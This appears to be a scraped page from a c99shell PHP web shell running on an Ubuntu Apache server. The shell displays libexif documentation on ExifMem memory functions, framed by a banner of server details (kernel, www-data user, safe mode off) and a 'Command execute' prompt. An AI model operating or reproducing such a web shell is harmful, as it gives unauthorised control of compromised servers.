Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure) /usr/share/doc/libexif-doc/libexif-api.html/ drwxr-xr-x | |
| Viewing file: Select action/file-type:
Define the ExifMem data type and the associated functions. ExifMem defines the memory management functions used within libexif. More... #include <libexif/exif-utils.h>Go to the source code of this file.
Detailed DescriptionDefine the ExifMem data type and the associated functions. ExifMem defines the memory management functions used within libexif. Typedef Documentation◆ ExifMemAllocFunc
Should work like calloc()
◆ ExifMemFreeFunc
Free method for ExifMem.
◆ ExifMemReallocFunc
Should work like realloc()
Function Documentation◆ exif_mem_new()
Create a new ExifMem.
Referenced by exif_mem_new_default(). ◆ exif_mem_new_default()
Create a new ExifMem with default values for your convenience.
References exif_mem_new(). Referenced by exif_data_new(), exif_entry_new(), exif_loader_new(), and exif_log_new(). ◆ exif_mem_unref()
Unrefcount an ExifMem. If the refcount reaches 0, the ExifMem is freed Referenced by exif_data_new(), exif_entry_new(), and exif_loader_new(). | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
:: Command execute :: | |
--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]-- |